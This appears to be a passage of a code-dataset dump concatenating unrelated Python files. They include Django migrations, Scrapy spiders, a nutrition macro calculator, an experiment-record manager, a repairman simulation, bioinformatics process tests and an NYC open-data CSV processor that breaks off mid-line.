('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),\n 'salt_function': ('django.db.models.fields.CharField', [], {'max_length': '256'}),\n 'salt_target': ('django.db.models.fields.CharField', [], {'max_length': '256'})\n }\n }\n\n complete_apps = ['main']","sub_path":"django_saltstack/main/migrations/0003_auto__del_field_saltcommand_created__del_field_saltcommand_modified__a.py","file_name":"0003_auto__del_field_saltcommand_created__del_field_saltcommand_modified__a.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"350967204","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.http import Request,FormRequest\n\nclass LoginSpider(scrapy.Spider):\n name = 'Login'\n allowed_domains = ['example.webscraping.com']\n start_urls = ['http://example.webscraping.com/places/default/user/profile?_next=/places/default/edit/China-47']\n\n def parse(self, response):\n keys = response.xpath('//*[@id=\"web2py_user_form\"]/form/table//label').xpath('./text()').re(\"(.+): \")\n values = response.xpath('//*[@id=\"web2py_user_form\"]/form/table//td[@class=\"w2p_fw\"]/text()').extract()\n yield dict(zip(keys, values))\n\n def start_requests(self):\n login_url = 'http://example.webscraping.com/places/default/user/login?_next=/places/default/edit/China-47'\n yield Request(login_url, callback=self.login)\n\n def login(self, response):\n sel = response.xpath('//*[@id=\"web2py_user_form\"]/form/div/input')\n fd = dict(zip(sel.xpath('./@name').extract(), sel.xpath('./@value').extract()))\n fd['email'] = '136219065@qq.com'\n fd['password'] = '123456'\n request = FormRequest('http://example.webscraping.com/places/default/user/login?_next=/places/default/edit/China-47', formdata=fd, callback=self.parse_login)\n yield request\n\n def parse_login(self, response):\n if 'Welcome ' in response.text:\n yield from 
super().start_requests()\n\n\n\n","sub_path":"scrapy/login/login/spiders/Login.py","file_name":"Login.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"281100174","text":"import pandas as pd\nexcel_data = pd.read_csv(\"my_excel_data.csv\")\n\ndef get_macros(food):\n    macros = []\n    macros.extend(excel_data[excel_data.name == food].calories)\n    macros.extend(excel_data[excel_data.name == food].fat)\n    macros.extend(excel_data[excel_data.name == food].protein)\n    macros.extend(excel_data[excel_data.name == food].carb)\n    macros.extend(excel_data[excel_data.name == food].fiber)\n    macros.extend(excel_data[excel_data.name == food].serving)\n    return macros\n\n\ntotals = {\n    'calories': 0,\n    'protein': 0,\n    'fat': 0,\n    'carbs': 0,\n    'fiber': 0,\n    'net_carbs': 0\n}\n\ndef add_food(food, grams):\n    totals['calories'] += get_macros(food)[0] * grams / get_macros(food)[5]\n    totals['fat'] += get_macros(food)[1] * grams / get_macros(food)[5]\n    totals['protein'] += get_macros(food)[2] * grams / get_macros(food)[5]\n    totals['carbs'] += get_macros(food)[3] * grams / get_macros(food)[5]\n    totals['fiber'] += get_macros(food)[4] * grams / get_macros(food)[5]\n    totals['net_carbs'] += (get_macros(food)[3] * grams / get_macros(food)[5]) - (get_macros(food)[4] * grams / get_macros(food)[5])\n    if totals['net_carbs'] >= 20.0:\n        print (\"You're over your carb limit!!!\")\n    else:\n        print ('You have {} net carbs left.'.format(20 - totals['net_carbs']))\n    return totals\n\n\ndef clear_totals():\n    for key in totals:\n        totals[key] = 0\n    return totals\n\n\ndef calculate_macro_percentages():\n    calories = totals['protein']*4 + totals['fat']*9 + totals['net_carbs']*4\n    protein_percent = str((totals['protein'] * 4 / calories)*100) + '%'\n    fat_percent = str((totals['fat'] * 9 / calories)*100) + '%'\n    carb_percent = str((totals['net_carbs'] * 4 / calories)*100) + '%'\n    percentages = {\n        'Fat': fat_percent,\n        'Protein': protein_percent,\n        'Carbs': carb_percent,\n        'Net_Carbs': totals['net_carbs']}\n    return percentages\n\n\ndef pie_chart_data():\n    calories = totals['protein']*4 + totals['fat']*9 + totals['net_carbs']*4 + 1\n    protein_percent = totals['protein'] * 4 / calories\n    fat_percent = totals['fat'] * 9 / calories\n    carb_percent = totals['net_carbs'] * 4 / calories\n    percentages = {\n        'Fat': fat_percent,\n        'Protein': protein_percent,\n        'Carb': carb_percent}\n    return percentages\n\n\nimport matplotlib.pyplot as plt\nfrom collections import Counter\n\n# Data to plot\nlabels = list(Counter(pie_chart_data()))\nsizes = list(Counter(pie_chart_data()).values())\ncolors = ['lightblue', 'lightcoral', 'yellowgreen']\nexplode = (.1, .1, .1)\n\n# Plot\nplt.pie(sizes, explode=explode, labels=labels, colors=colors,\n        autopct='%1.1f%%', shadow=True, startangle=140)\n\nplt.axis('equal')\nplt.show()\n","sub_path":"food_functions.py","file_name":"food_functions.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"372438522","text":"# Not recommended: accessing a class attribute through instance_name.attribute can cause problems\n\nclass Tool(object):\n    # Define a class attribute that records the number of tools\n    cout = 0\n    def __init__(self, name):\n        self.name = name\n        # Increment the class attribute; note that self cannot be used here\n        Tool.cout += 1\n\ntooll = Tool(\"axe\")\ntooll1 = Tool(\"hammer\")\ntooll2 = Tool(\"bucket\")\ntooll3 = Tool(\"screwdriver\")\n\n\ntooll3.cout = 99\nprint(tooll3.cout)\n# The pitfall is here: assignment in Python first looks the attribute up, and creates a new instance attribute if it is not found\nprint('====> %d' % 
Tool.cout)","sub_path":"05类的属性,方法还有静态方法/hm_陷阱.py","file_name":"hm_陷阱.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"383991823","text":"\"\"\"Record class.\"\"\"\nfrom __future__ import annotations\n\nimport collections\nimport shutil\nfrom collections import OrderedDict, UserList\nfrom subprocess import CalledProcessError  # noqa: S404\nfrom typing import Any, Callable\n\nimport pymongo\nimport ray\nfrom bson.objectid import ObjectId\nfrom omegaconf import DictConfig, OmegaConf\n\nfrom xplogger.experiment_manager.record import base as base_record\nfrom xplogger.experiment_manager.record import omegaconf as oc_utils\nfrom xplogger.experiment_manager.record.mongo import Record as MongoRecord\nfrom xplogger.experiment_manager.slurm.utils import map_jobid_to_raw_job_id\nfrom xplogger.parser.experiment.experiment import (\n    Experiment,\n    ExperimentSequence,\n    ExperimentSequenceDict,\n)\nfrom xplogger.types import ValueType\n\nLoadExperientFromDirType = Callable[[str], Experiment]\n\n\nclass RecordList(UserList):  # type: ignore\n    def __init__(self, records: list[base_record.Record]):\n        \"\"\"Dict-like interface to a collection of results.\"\"\"\n        super().__init__(records)\n\n    def update_status(\n        self,\n        collection: pymongo.collection.Collection,  # type: ignore\n        new_status: str,\n    ) -> None:\n        \"\"\"Update the status of the records (in the db).\n\n        Args:\n            collection (pymongo.collection.Collection):\n\n        \"\"\"\n        if isinstance(self.data[0], DictConfig):\n\n            def process_record(record: base_record.Record) -> dict:  # type: ignore\n                # error: Returning Any from function declared to return \"Dict[Any, Any]\"\n                data = OmegaConf.to_container(record)\n                assert isinstance(data, dict)\n                return data\n\n        else:\n\n            def process_record(record: base_record.Record) -> base_record.Record:  # type: ignore\n                # error: All conditional function variants must have identical signatures\n                return record\n\n        for data_record in self.data:\n            record = process_record(data_record)\n            issue_id = record[\"setup\"][\"git\"][\"issue_id\"]\n            print(issue_id)\n            record[\"status\"] = new_status\n            key = \"_id\"\n            if key in record:\n                _id = ObjectId(record.pop(\"_id\"))\n            else:\n                key = \"id\"\n                _id = ObjectId(record.pop(key))\n            print(collection.replace_one({\"_id\": _id}, record).raw_result)\n\n    def mark_analyzed(self, collection: pymongo.collection.Collection) -> None:  # type: ignore\n        # error: Missing type parameters for generic type \"Collection\"\n        \"\"\"Mark records as analyzed (in the db).\n\n        Args:\n            collection (pymongo.collection.Collection):\n\n        \"\"\"\n        return self.update_status(collection=collection, new_status=\"ANALYZED\")\n\n    def add_slurm_field(self, collection: pymongo.collection.Collection) -> None:  # type: ignore\n        \"\"\"Add slurm field to records (in the db).\n\n        Args:\n            collection (pymongo.collection.Collection):\n\n        \"\"\"\n        if isinstance(self.data[0], DictConfig):\n\n            def process_record(record: base_record.Record) -> dict:  # type: ignore\n                # error: Returning Any from function declared to return \"Dict[Any, Any]\"\n                data = OmegaConf.to_container(record)\n                assert isinstance(data, dict)\n                return data\n\n        else:\n\n            def process_record(record: base_record.Record) -> base_record.Record:  # type: ignore\n                # error: All conditional function variants must have identical signatures\n                return record\n\n        for data_record in self.data:\n            record = process_record(data_record)\n            # only remap records that already carry a slurm id\n            if \"slurm\" in record[\"setup\"]:\n                try:\n                    
record[\"setup\"][\"slurm\"] = {\n \"id\": map_jobid_to_raw_job_id(record[\"setup\"][\"slurm\"][\"id\"])\n }\n except CalledProcessError:\n # record[\"setup\"][\"slurm\"] = {\"id\": -1}\n print(record[\"setup\"][\"slurm\"][\"id\"])\n continue\n print(record[\"setup\"][\"slurm\"][\"id\"])\n _id = ObjectId(record.pop(\"_id\"))\n print(collection.replace_one({\"_id\": _id}, record).raw_result)\n\n def delete(\n self,\n collection: pymongo.collection.Collection, # type: ignore\n # error: Missing type parameters for generic type \"Collection\"\n delete_from_filesystem: bool = False,\n ) -> None:\n \"\"\"Delete jobs from the db and filesystem (optionally).\n\n Args:\n collection (pymongo.collection.Collection):\n delete_from_filesystem (bool, optional): Should delete the job\n from the filesystem. Defaults to False.\n \"\"\"\n counter = 0\n for record in self.data:\n counter += 1\n collection.delete_many({\"setup.id\": record[\"setup\"][\"id\"]})\n if delete_from_filesystem:\n try:\n file_path = record[\"logbook\"][\"logger_dir\"]\n shutil.rmtree(file_path)\n except Exception as e:\n print(f\"Failed to delete {file_path}. Reason: {e}\")\n print(counter)\n\n def get_unique_issues(self) -> collections.Counter[str]:\n \"\"\"Get unique issues from the record list.\"\"\"\n return collections.Counter(\n str(record[\"setup\"][\"git\"][\"issue_id\"]) for record in self.data\n )\n\n def get_viz_params(self) -> set[str]:\n \"\"\"Get params for vizualization.\"\"\"\n viz_params = set()\n for record in self.data:\n if record[\"setup\"][\"viz\"][\"params\"]:\n for param in record[\"setup\"][\"viz\"][\"params\"]:\n viz_params.add(param)\n return viz_params\n\n def make_oc_records(self) -> RecordList:\n \"\"\"Make OC records.\"\"\"\n record_list = []\n for record in self.data:\n assert isinstance(record, MongoRecord)\n record_list.append(oc_utils.make_record(mongo_record=record))\n\n return RecordList(record_list)\n\n def ray_make_oc_records(self) -> RecordList:\n \"\"\"Make OC records using ray.\"\"\"\n futures = [\n oc_utils.ray_make_record.remote(mongo_record=record) for record in self.data\n ]\n records = ray.get(futures)\n return RecordList(records=records)\n\n def map_to_slurm_id(self) -> dict[str, RecordList]:\n \"\"\"Map the record list to a list of slurm ids.\n\n Returns:\n dict[str, RecordList]: dictionary where the key is the slurm id\n and value is the list of records. 
We return a list of records\n as sometimes the records are duplicated.\n \"\"\"\n\n def _make_empty_record_list() -> RecordList:\n return RecordList([])\n\n mapping: dict[str, RecordList] = collections.defaultdict(\n _make_empty_record_list\n )\n for record in self.data:\n key = str(record[\"setup\"][\"slurm\"][\"id\"].replace(\"_\", \"-\"))\n mapping[key].append(record)\n return mapping\n\n # todo: rename this\n def get_groups_and_hyperparams(\n self, viz_params: list[str]\n ) -> tuple[dict[Any, RecordList], dict[str, set[ValueType]]]:\n \"\"\"Group experiments.\"\"\"\n groups: dict[Any, RecordList] = {}\n hyperparams: dict[str, set[Any]] = {}\n id_set = set()\n for record in self.data:\n params = base_record.get_experiment_params(record, viz_params)\n for param_name, value in params.items():\n if param_name not in hyperparams:\n hyperparams[param_name] = set()\n if isinstance(value, list):\n hyperparams[param_name].add(tuple(value))\n else:\n hyperparams[param_name].add(value)\n key = OmegaConf.create(params)\n if key not in groups:\n groups[key] = RecordList([])\n _id = record.id\n if _id not in id_set:\n groups[key].append(record)\n id_set.add(_id)\n\n return groups, hyperparams\n\n def load_experiments(\n self,\n load_experiment_from_dir: LoadExperientFromDirType,\n ) -> ExperimentSequence:\n \"\"\"Load experiments.\"\"\"\n experiments = [\n base_record.load_experiment(\n record=record,\n load_experiment_from_dir=load_experiment_from_dir,\n )\n for record in self.data\n ]\n exp_seq = ExperimentSequence([exp for exp in experiments if exp is not None])\n return exp_seq\n\n def make_experiment_sequence_dict_groups_and_hyperparams(\n self,\n viz_params: list[str],\n load_experiment_from_dir: LoadExperientFromDirType,\n ) -> tuple[\n ExperimentSequenceDict, dict[Any, RecordList], dict[str, set[ValueType]]\n ]:\n \"\"\"Make experiment groups.\"\"\"\n groups, hyperparams = self.get_groups_and_hyperparams(viz_params=viz_params)\n experiment_sequence_dict = ExperimentSequenceDict(\n {\n key: record_list.load_experiments(\n load_experiment_from_dir=load_experiment_from_dir\n )\n for key, record_list in groups.items()\n }\n )\n return experiment_sequence_dict, groups, hyperparams\n\n def ray_make_experiment_sequence_dict_groups_and_hyperparams(\n self,\n viz_params: list[str],\n load_experiment_from_dir: LoadExperientFromDirType,\n ) -> tuple[\n ExperimentSequenceDict, dict[Any, RecordList], dict[str, set[ValueType]]\n ]:\n \"\"\"Make experiment groups.\"\"\"\n groups, hyperparams = self.get_groups_and_hyperparams(viz_params=viz_params)\n\n groups = OrderedDict(groups)\n\n experiment_sequence_dict = ExperimentSequenceDict(\n {\n key: ray_load_experiments.remote(\n record_list=record_list,\n load_experiment_from_dir=load_experiment_from_dir,\n )\n for key, record_list in groups.items()\n }\n )\n for key in experiment_sequence_dict:\n experiment_sequence_dict[key] = ExperimentSequence(\n ray.get(experiment_sequence_dict[key])\n )\n return experiment_sequence_dict, groups, hyperparams\n\n def get_unique(self, key_func: Callable[[base_record.Record], str]) -> RecordList:\n \"\"\"Get unique records from the current record list.\n\n Args:\n key_func (Callable[[base_record.Record], str]): This function\n computes the key (or hash) unsed to identify a record.\n\n Returns:\n RecordList: List of unique records.\n \"\"\"\n seen_keys = set()\n unique_records = []\n for record in self.data:\n key = key_func(record)\n if key not in seen_keys:\n seen_keys.add(key)\n unique_records.append(record)\n return 
RecordList(unique_records)\n\n\n@ray.remote  # type: ignore\n# Untyped decorator makes function \"ray_load_experiments\" untyped\ndef ray_load_experiments(\n    record_list: RecordList,\n    load_experiment_from_dir: LoadExperientFromDirType,\n) -> Any:\n    \"\"\"Load experiments.\"\"\"\n    futures = [\n        base_record.ray_load_experiment.remote(\n            record=record,\n            load_experiment_from_dir=load_experiment_from_dir,\n        )\n        for record in record_list.data\n    ]\n\n    return ray.get(futures)\n","sub_path":"xplogger/experiment_manager/record/record_list.py","file_name":"record_list.py","file_ext":"py","file_size_in_byte":11568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"243666872","text":"'''\n513. Find Bottom Left Tree Value\nDescription Submission Solutions Add to List\nTotal Accepted: 2100\nTotal Submissions: 4185\nDifficulty: Medium\nContributors: abhijeet17\nGiven a binary tree, find the leftmost value in the last row of the tree.\n\nExample 1:\nInput:\n\n    2\n   / \\\n  1   3\n\nOutput:\n1\nExample 2: \nInput:\n\n        1\n       / \\\n      2   3\n     /   / \\\n    4   5   6\n       /\n      7\n\nOutput:\n7\n'''\n# Definition for a binary tree node.\n# class TreeNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nclass Solution(object):\n    def findBottomLeftValue(self, root):\n        \"\"\"\n        :type root: TreeNode\n        :rtype: int\n        \"\"\"\n        maxlst = [root.val]\n        self.nodedepth(root, 0, maxlst)\n        return maxlst[-1]\n    def nodedepth(self, node, depth, maxlst):\n        if not node.left and not node.right:\n            return\n        elif not node.left:\n            if len(maxlst) < depth+2:\n                maxlst.append(node.right.val)\n            self.nodedepth(node.right, depth+1, maxlst)\n        elif not node.right:\n            if len(maxlst) < depth+2:\n                maxlst.append(node.left.val)\n            self.nodedepth(node.left, depth+1, maxlst)\n        else:\n            if len(maxlst) < depth+2:\n                maxlst.append(node.left.val)\n            self.nodedepth(node.left, depth+1, maxlst)\n            self.nodedepth(node.right, depth+1, maxlst)","sub_path":"en/find-bottom-left-tree-value.py","file_name":"find-bottom-left-tree-value.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"331338907","text":"import collections\nimport re\nimport jieba\n\ndef stats_text_cn(w):\n    if type(w) != str:\n        raise ValueError('Oops! That was not a string type. Try again...')\n    cn = re.findall(r'[\\u4e00-\\u9fa5]', w)\n    cn_join = ''.join(cn)\n    seg_cn = jieba.cut(cn_join)\n    seg_words = []\n    for element in seg_cn:\n        if len(element) > 1:\n            seg_words.append(element)\n    count = 20\n    cn_count = collections.Counter(seg_words).most_common(count)\n    return cn_count\n\ndef stats_text_en(w):\n    if type(w) != str:\n        raise ValueError('Oops! That was not a string type. 
Try again...')\n    en = re.findall(r'[a-zA-Z\\s]', w)\n    en = ''.join(en)\n    en = en.split()\n    count = 200\n    en_count = collections.Counter(en).most_common(count)\n    return en_count\n\ndef stats_text(w):\n    text_count = stats_text_cn(w) + stats_text_en(w)\n    return text_count\n","sub_path":"exercises/1901100025/d10/mymodule/stats_word.py","file_name":"stats_word.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"521096486","text":"import copy\n\nimport mcts\nimport numpy as np\n\n\nclass Repairman:\n    def __init__(self, env, system, capacity, scheduling_policy):\n        self.env = env\n        self.system = system\n        \n        self.capacity = capacity\n        self.utilization = 0\n\n        self.scheduling_policy = scheduling_policy            \n\n        # queue data in the form of [time, queue level]\n        self.queue_data = np.zeros((0, 2))\n\n    \n    def get_queue(self):\n        queue = []\n        #print(f't={self.env.now}')\n        for machine in self.system.machines:\n            #print(f'M{machine.index}', machine.__dict__, '\\n\\n')\n            if (\n                (machine.in_queue) \n                and (machine.health > 0)\n                #or ((not machine.under_repair) and (machine.get_health(self.env.now) >= machine.maintenance_threshold))\n                # TODO: fix this behavior\n                # currently machine health data is updated before it is placed \n                # in the queue, so if it fails at the same time as MCTS is \n                # formulated it will not be considered in the schedule, but will\n                # still fail\n            ):\n                queue.append(machine)\n\n        return queue\n    \n\n    def schedule_maintenance(self):\n        queue = self.get_queue()\n\n        if self.system.debug:\n            if self.system.mcts_system:\n                print('MCTS: ', end='')\n            print(f'Queue at t={self.env.now}: {[(machine.index, machine.get_health(self.env.now)) for machine in queue]}')\n        \n        if (len(queue) == 0) or (self.utilization == self.capacity):\n            self.update_queue_data()\n            return\n        elif len(queue) == 1:\n            if self.system.debug:\n                if self.system.mcts_system:\n                    print('MCTS: ', end='')\n                print(f'Queue length 1, repairman starting maintenance on M{queue[0].index} at t={self.env.now}')\n            #self.utilization += 1\n            next_machine = queue[0]\n            #self.env.process(queue[0].repair())\n            #return\n        #elif type(self.scheduling_policy) == list:\n        #    # schedule according to list, [first, second, third, ...]\n        #    if self.system.debug:\n        #        if self.system.mcts_system:\n        #            print('MCTS: ', end='')\n        #        print(f'Repairman\\'s current schedule: {self.scheduling_policy}')\n        #    for machine in queue:\n        #        #try: # TODO: fix this block\n        #        if machine.index == self.scheduling_policy[0]:\n        #            next_machine = machine\n        #            del(self.scheduling_policy[0])\n        #            break\n        #        #except:\n        #        #    print('ERROR HERE')\n        #        #    print(f't={self.env.now}', self.scheduling_policy, [m.index for m in queue])\n        #        #    print([machine.allow_new_failures for machine in self.system.machines])\n        #        #self.env.process(next_machine.repair())\n        else: # len(queue) > 1\n            next_machine = self.resolve_simultaneous_repairs()\n        \n        self.utilization += 1\n        self.env.process(next_machine.repair())\n        \n\n    def resolve_simultaneous_repairs(self):\n        queue = self.get_queue()\n\n        # FIFO policy\n        next_machine = min(queue, key=lambda m: m.time_entered_queue)\n        \n        if self.system.debug:\n            if self.system.mcts_system:\n                print('MCTS: ', end='')\n            print(f'Repairman selecting M{next_machine.index} for repair at t={self.env.now}')\n\n        #self.utilization += 1\n        #self.env.process(next_machine.repair())\n        return next_machine\n\n\n    def update_queue_data(self):\n        queue_length = len(self.get_queue())\n        self.queue_data = np.append(\n            self.queue_data, 
[[self.env.now, queue_length]], axis=0\n        )\n","sub_path":"simantha/Repairman.py","file_name":"Repairman.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"364465268","text":"import urllib.request\nimport urllib.error\nimport os\nfrom bs4 import BeautifulSoup\n\nclass Spider:\n    mainPage = ''\n    root = ''\n    maxPage = ''\n    tree = {}\n\n    def __init__(self, mainPage, maxPage, root):\n        self.mainPage = mainPage\n        self.maxPage = maxPage\n        self.root = root\n\n    # Parse the HTML\n    def __getHtmlContent(self, url):\n        try:\n            res = urllib.request.urlopen(url, timeout=5)\n            html = res.read().decode('utf-8')\n            return BeautifulSoup(html)\n        except urllib.error.HTTPError:\n            print('timeout')\n            return ''\n        except Exception:\n            return ''\n\n    # Save an image\n    def __saveImage(self, url, path, filename):\n        try:\n            if not os.path.exists(path):\n                os.makedirs(path)\n            if os.path.exists(path+filename):\n                return ''\n            img = urllib.request.urlopen(url, timeout=5)\n            img = img.read()\n            file = open(path+filename, 'wb')\n            file.write(img)\n            file.close()\n            return ''\n        except urllib.error.HTTPError:\n            print('timeout')\n            return ''\n        except Exception:\n            print('wrong')\n            return ''\n\n\n    # Get the list of image URLs for one girl\n    def __getOneGirlImageUrls(self, url):\n        list = []\n        try:\n            # Get the total number of pages for each person\n            totalPage = self.__getHtmlContent(url).find(id = 'opic').previous_sibling.string\n            for page in range(1, int(totalPage)):\n                page = str(page)\n                html = self.__getHtmlContent(url + '/' + page)\n                res = html.find(id='content')\n                src = res.a.img['src']\n                list.append(src)\n        except Exception:\n            print('wrong')\n        return list\n\n\n    # Build the tree structure of the site's image URLs\n    def __getNodeTree(self):\n        for page in range(1, self.maxPage):\n            page = str(page)\n            self.tree[page] = {}\n            mainHtml = self.__getHtmlContent(self.mainPage+'/'+page)\n            try:\n                images = mainHtml.find_all('li')\n                for li in images:\n                    coverImg = li.a.img['src']\n                    coverName = li.a.img['alt']\n                    coverUrl = li.a['href']\n                    self.tree[page][coverImg] = {}\n                    temp = {'name':'', 'img':'', 'list':[]}\n                    temp['name'] = coverName\n                    temp['img'] = coverImg\n                    temp['list'] = self.__getOneGirlImageUrls(coverUrl)\n                    self.tree[page][coverImg] = temp\n                    print(temp)\n            except Exception:\n                print('wrong')\n        print(self.tree)\n\n\n    def __parserTree(self):\n        for page in self.tree:\n            for coverImg in self.tree[page]:\n                coverImg = self.tree[page][coverImg]['img']\n                coverName = self.tree[page][coverImg]['name']\n                coverList = self.tree[page][coverImg]['list']\n                path = self.root+'/'+str(page)+'/'+coverName+'/'\n                filename = 'cover.jpg'\n                self.__saveImage(coverImg, path, filename)\n                print(path + filename)\n                i = 1\n                for list in coverList:\n                    filename = str(i)+'.jpg'\n                    self.__saveImage(list, path, filename)\n                    i += 1\n                    print(path + filename)\n\n\n    def run(self):\n        print('Generating the site image URL tree....')\n        self.__getNodeTree()\n        print('Site tree generated, starting to crawl images....')\n        self.__parserTree()\n        print('Crawling finished!')\n\nif __name__ == \"__main__\":\n    spider = Spider('http://www.mmjpg.com/home', 2, 'image')\n    print('Process started....')\n    spider.run()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"619091817","text":"from resolwe.flow.models import Data\nfrom resolwe.test import tag_process\n\nfrom resolwe_bio.utils.test import BioProcessTestCase\n\n\nclass PlotsProcessorTestCase(BioProcessTestCase):\n    @tag_process(\"bamplot\")\n    def test_bamplot(self):\n        
with self.preparation_stage():\n            inputs = {\n                \"src\": \"bamplot_alignment.bam\",\n                \"species\": \"Homo sapiens\",\n                \"build\": \"hg19\",\n            }\n            bam = self.run_process(\"upload-bam\", inputs)\n\n            inputs = {\n                \"src\": \"bamplot_alignment.bam\",\n                \"species\": \"Homo sapiens\",\n                \"build\": \"hg19\",\n            }\n            bam1 = self.run_process(\"upload-bam\", inputs)\n\n            bed_input = {\n                \"src\": \"bamplot.bed\",\n                \"species\": \"Homo sapiens\",\n                \"build\": \"hg19\",\n            }\n            bed = self.run_process(\"upload-bed\", bed_input)\n\n            inputs = {\n                \"src\": \"bamplot.gff\",\n                \"source\": \"NCBI\",\n                \"species\": \"Homo sapiens\",\n                \"build\": \"GRCh38\",\n            }\n            gff = self.run_process(\"upload-gtf\", inputs)\n\n        inputs = {\n            \"genome\": \"HG19\",\n            \"input_region\": \"chr1:+:41468594-41566948\",\n            \"bam\": [bam.pk, bam1.pk],\n            \"color\": \"0,69,134\",\n            \"names\": [\"WNT\", \"bbb\"],\n            \"yscale\": \"uniform\",\n            \"title\": \"SINGLE_REGION\",\n            \"plot\": \"multiple\",\n            \"rpm\": True,\n        }\n        self.run_process(\"bamplot\", inputs)\n\n        inputs = {\n            \"genome\": \"HG19\",\n            \"input_gff\": gff.pk,\n            \"bam\": [bam.pk],\n            \"color\": \"255,192,0\",\n            \"names\": [\"GROUP3_MB\"],\n            \"yscale\": \"uniform\",\n            \"title\": \"SINGLE_REGION\",\n            \"plot\": \"multiple\",\n            \"rpm\": True,\n            \"bed\": [bed.pk],\n        }\n        self.run_process(\"bamplot\", inputs)\n\n        for data in Data.objects.all():\n            self.assertStatus(data, Data.STATUS_DONE)\n\n    @tag_process(\"bamliquidator\")\n    def test_bamliquidator(self):\n        with self.preparation_stage():\n            inputs = {\n                \"src\": \"bamplot_ alignment1.bam\",\n                \"species\": \"Homo sapiens\",\n                \"build\": \"hg19\",\n            }\n            bam1 = self.run_process(\"upload-bam\", inputs)\n\n            inputs = {\n                \"src\": \"bamplot_alignment.bam\",\n                \"species\": \"Homo sapiens\",\n                \"build\": \"hg19\",\n            }\n            bam = self.run_process(\"upload-bam\", inputs)\n\n            inputs = {\n                \"src\": \"bamplot.gff\",\n                \"source\": \"NCBI\",\n                \"species\": \"Homo sapiens\",\n                \"build\": \"GRCh38\",\n            }\n            gff = self.run_process(\"upload-gtf\", inputs)\n\n        inputs = {\"bam\": [bam1.id, bam.id], \"cell_type\": \"MCD cell\", \"extension\": 200}\n\n        bamliquidator = self.run_process(\"bamliquidator\", inputs)\n        del bamliquidator.output[\"summary\"][\"total_size\"]  # Non-deterministic output.\n        self.assertFields(\n            bamliquidator, \"summary\", {\"file\": \"output/summary.html\", \"size\": 524296}\n        )\n\n        inputs[\"regions_gtf\"] = gff.id\n        inputs[\"analysis_type\"] = \"region\"\n        self.run_process(\"bamliquidator\", inputs)\n\n        for data in Data.objects.all():\n            self.assertStatus(data, Data.STATUS_DONE)\n","sub_path":"resolwe_bio/tests/processes/test_plots.py","file_name":"test_plots.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"281651620","text":"def get_parameter(name):\n    while True:\n        p = input(\"Enter the parameter of the equation: %s = \" % name)\n        if p.replace('.', '').isdigit() and float(p) != 0:\n            p = float(p)\n            return p\n        else:\n            print(\"Please enter a non-zero number!\")\n\nclass QadraticEquation:\n    def __init__(self, a, b, c):\n        self.a = a\n        self.b = b\n        self.c = c\n\n    def get_descr(self):\n        d = self.b ** 2 - 4 * self.a * self.c\n        return d\n\n    def res(self, d):\n        self.d = d\n        if d < 0:\n            return(\"No results!\")\n        else:\n            x1 = (-self.b + self.d **(1/2.0)) / (2 * self.a)\n            x2 = (-self.b - self.d **(1/2.0)) / (2 * self.a)\n            return(\"Results: x1 = %s, x2 = %s\" % (x1, 
x2))\n","sub_path":"week3]/quadro/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"122030724","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\nimport os\nimport sys\nimport json\nimport csv\nimport re\nimport string\nfrom noise.models import Building\n\n#from noise.models import BuildingBuildingExtraInfo, HandyManWorkOrderCharges, ECBViolation, BuildingImage, DOBComplaint, Complaint, Review, ReviewImage, Building, Violation, WorkPermit, BuildingOwner\n\nimport pandas as pd\n\n\n\"\"\"\nDownloading data sets and processing CSVs from nycopendata\n\"\"\"\n\ndef process_handyman_work_order(file_name, new_file_name):\n\t\"\"\"process each row of HWO data\"\"\"\n\tcount = 0\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = csv.writer(address_write)\n\t\treader_object = csv.reader(f)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\n\t\t\t(HWOID, HWONumber, building_id, boro_id, boro, house_number, streetname, zipcode, block, lot, lifecycle, worktypegeneral, hwo_status_reason, hwo_create_date, is_aep, is_commercial_demolition, fema_event_id, fema_event, hwo_description, hwo_approved_amount, sales_tax, admin_fee, charge_amount, date_transfer_dof) = row\n\t\t\tbuilding_id = str(row[2]).strip()\n\t\t\tboro = str(row[3]).strip()\n\t\t\tblock = str(row[8]).strip()\n\t\t\tlot = str(row[9]).strip()\n\t\t\tborough = str(row[4]).strip()\n\t\t\thouse_number = str(row[5]).strip()\n\t\t\tstreetname = str(row[6]).strip()\n\t\t\tzip_code = 